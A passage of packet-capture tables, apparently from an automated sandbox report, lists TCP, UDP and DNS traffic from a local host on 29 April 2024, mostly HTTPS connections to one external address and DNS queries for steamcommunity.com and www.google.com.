Apr 29, 2024 22:13:29.083169937 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.083195925 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.083214998 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.083282948 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.083298922 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.083323002 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.083384037 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.186425924 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.186449051 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.186517954 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.186532974 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.186573982 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.186589956 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.334290028 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.334319115 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.334482908 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.334482908 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.334496021 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.334770918 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.441355944 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.441381931 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.441437960 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.441451073 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.441494942 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.441494942 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.518146992 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.518177032 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.518290997 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.518317938 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.518414974 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.568770885 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.568792105 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.568867922 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.568882942 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.568993092 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.613764048 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.613786936 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.613898039 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.613909006 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.613961935 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.655406952 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.655438900 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.655536890 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.655546904 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.655935049 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.700181961 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.700207949 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.700400114 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.700401068 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.700408936 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.700464010 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.745331049 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.745356083 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.745526075 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.745542049 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.745610952 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.781461000 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.781487942 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.782044888 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.782066107 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.782363892 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.807405949 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.807432890 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.807657003 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.807671070 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.807722092 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.833035946 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.833062887 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.833132029 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.833139896 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.833189964 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.833189964 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.854476929 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.854510069 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.854568958 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.854577065 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.854604006 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.854645967 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.876791954 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.876825094 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.877027035 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.877051115 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.877212048 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.891444921 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.891485929 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.891545057 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:29.891632080 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.891632080 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.891632080 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.896730900 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:29.896753073 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:30.057651043 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.057697058 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:30.057765961 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.058128119 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.058140039 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:30.529227972 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:30.529413939 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.529808044 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.529818058 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:30.529998064 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:30.530002117 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.274271965 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.274298906 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.274321079 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.274349928 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.274410009 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.274410009 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.274420977 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.274470091 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.380856037 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.380878925 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.380939960 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.380959034 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.381000996 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.534719944 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.534744024 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.534818888 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.534840107 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.534885883 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.644766092 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.644788980 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.644870043 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.644882917 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.644937038 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.712336063 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.712389946 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.712435007 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.712438107 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.712476969 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.712500095 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.713037968 CEST	49770	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.713052034 CEST	443	49770	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.942715883 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.942754984 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:31.942825079 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.943094015 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:31.943109035 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:32.399198055 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:32.401035070 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:32.401412010 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:32.401421070 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:32.401580095 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:32.401590109 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.247230053 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.247256041 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.247299910 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.247311115 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.247324944 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.247325897 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.247364998 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.247400999 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.247514963 CEST	49771	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.247530937 CEST	443	49771	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.250114918 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.250147104 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.250222921 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.250406027 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.250417948 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.703665018 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.703929901 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.704346895 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.704356909 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:33.704487085 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:33.704493046 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.556421041 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.556472063 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.556493998 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.556504011 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.556540966 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.556665897 CEST	49772	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.556678057 CEST	443	49772	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.575330973 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.575361967 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:34.575449944 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.575680017 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:34.575696945 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.048870087 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.048934937 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.049348116 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.049355030 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.049523115 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.049527884 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.911318064 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.911387920 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.911391020 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:35.911437988 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.912683964 CEST	49773	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:35.912698030 CEST	443	49773	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:36.636123896 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:36.636157036 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:36.636240959 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:36.636451006 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:36.636464119 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.110403061 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.110663891 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111129999 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111141920 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.111243963 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111249924 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.111340046 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111357927 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.111447096 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111464024 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.111474991 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111484051 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.111733913 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.111758947 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:37.127976894 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:37.127994061 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:38.605398893 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:38.605494022 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:38.605565071 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:38.605593920 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.320427895 CEST	49774	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.320465088 CEST	443	49774	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:39.325516939 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.325562000 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:39.325629950 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.325937986 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.325947046 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:39.798844099 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:39.798964024 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.808530092 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.808540106 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:39.812201977 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:39.812208891 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:40.688134909 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:40.688206911 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.688218117 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:40.688260078 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.688359976 CEST	49775	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.688369989 CEST	443	49775	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:40.689605951 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.689625978 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:40.689712048 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.689899921 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:40.689904928 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:41.160198927 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:41.160455942 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:41.160656929 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:41.160661936 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:41.160835981 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:41.160840988 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:42.032390118 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:42.032445908 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:42.032458067 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:42.032495975 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:42.032515049 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:42.032553911 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:42.032685041 CEST	49776	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:42.032697916 CEST	443	49776	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:55.513659954 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:55.513695002 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:55.513763905 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:55.514672041 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:55.514698982 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.119952917 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.120039940 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:56.123750925 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:56.123756886 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.123954058 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.131911993 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:56.176105976 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719264030 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719291925 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719325066 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719397068 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:56.719412088 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719472885 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:56.719474077 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:56.719516993 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:57.796817064 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:57.796848059 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:57.796888113 CEST	49777	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:57.796895981 CEST	443	49777	40.127.169.103	192.168.2.4
Apr 29, 2024 22:14:06.587177038 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.587222099 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.587439060 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.588129997 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.588140965 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.832513094 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.835268021 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.835284948 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.836365938 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.836425066 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.837701082 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.837758064 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.877810955 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:06.877825975 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:06.924504042 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:09.956321955 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 29, 2024 22:14:09.956418037 CEST	49724	80	192.168.2.4	199.232.210.172
Apr 29, 2024 22:14:10.065715075 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 29, 2024 22:14:10.065731049 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 29, 2024 22:14:10.065742970 CEST	80	49724	199.232.210.172	192.168.2.4
Apr 29, 2024 22:14:10.065792084 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 29, 2024 22:14:10.065886021 CEST	80	49724	199.232.210.172	192.168.2.4
Apr 29, 2024 22:14:10.065936089 CEST	49724	80	192.168.2.4	199.232.210.172
Apr 29, 2024 22:14:16.840642929 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:16.840701103 CEST	443	49779	142.250.191.196	192.168.2.4
Apr 29, 2024 22:14:16.840759993 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:18.321331978 CEST	49779	443	192.168.2.4	142.250.191.196
Apr 29, 2024 22:14:18.321357012 CEST	443	49779	142.250.191.196	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 22:12:57.039299965 CEST	63871	53	192.168.2.4	1.1.1.1
Apr 29, 2024 22:12:57.153511047 CEST	53	63871	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:02.220340967 CEST	53	50420	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:02.371845007 CEST	62853	53	192.168.2.4	1.1.1.1
Apr 29, 2024 22:13:02.372335911 CEST	61701	53	192.168.2.4	1.1.1.1
Apr 29, 2024 22:13:02.415172100 CEST	53	62252	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:02.482796907 CEST	53	61701	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:02.482851982 CEST	53	62853	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:04.585088968 CEST	53	57383	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:14.087209940 CEST	53	50595	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:21.527057886 CEST	138	138	192.168.2.4	192.168.2.255
Apr 29, 2024 22:13:25.795748949 CEST	53	55976	1.1.1.1	192.168.2.4
Apr 29, 2024 22:13:48.659003019 CEST	53	57775	1.1.1.1	192.168.2.4
Apr 29, 2024 22:14:01.963270903 CEST	53	55329	1.1.1.1	192.168.2.4
Apr 29, 2024 22:14:06.474561930 CEST	64264	53	192.168.2.4	1.1.1.1
Apr 29, 2024 22:14:06.475032091 CEST	49591	53	192.168.2.4	1.1.1.1
Apr 29, 2024 22:14:06.585498095 CEST	53	64264	1.1.1.1	192.168.2.4
Apr 29, 2024 22:14:06.585542917 CEST	53	49591	1.1.1.1	192.168.2.4
Apr 29, 2024 22:14:18.433835983 CEST	53	59637	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 29, 2024 22:12:57.039299965 CEST	192.168.2.4	1.1.1.1	0xe728	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 22:13:02.371845007 CEST	192.168.2.4	1.1.1.1	0xc3b3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 22:13:02.372335911 CEST	192.168.2.4	1.1.1.1	0x4a1f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 29, 2024 22:14:06.474561930 CEST	192.168.2.4	1.1.1.1	0xa8c3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
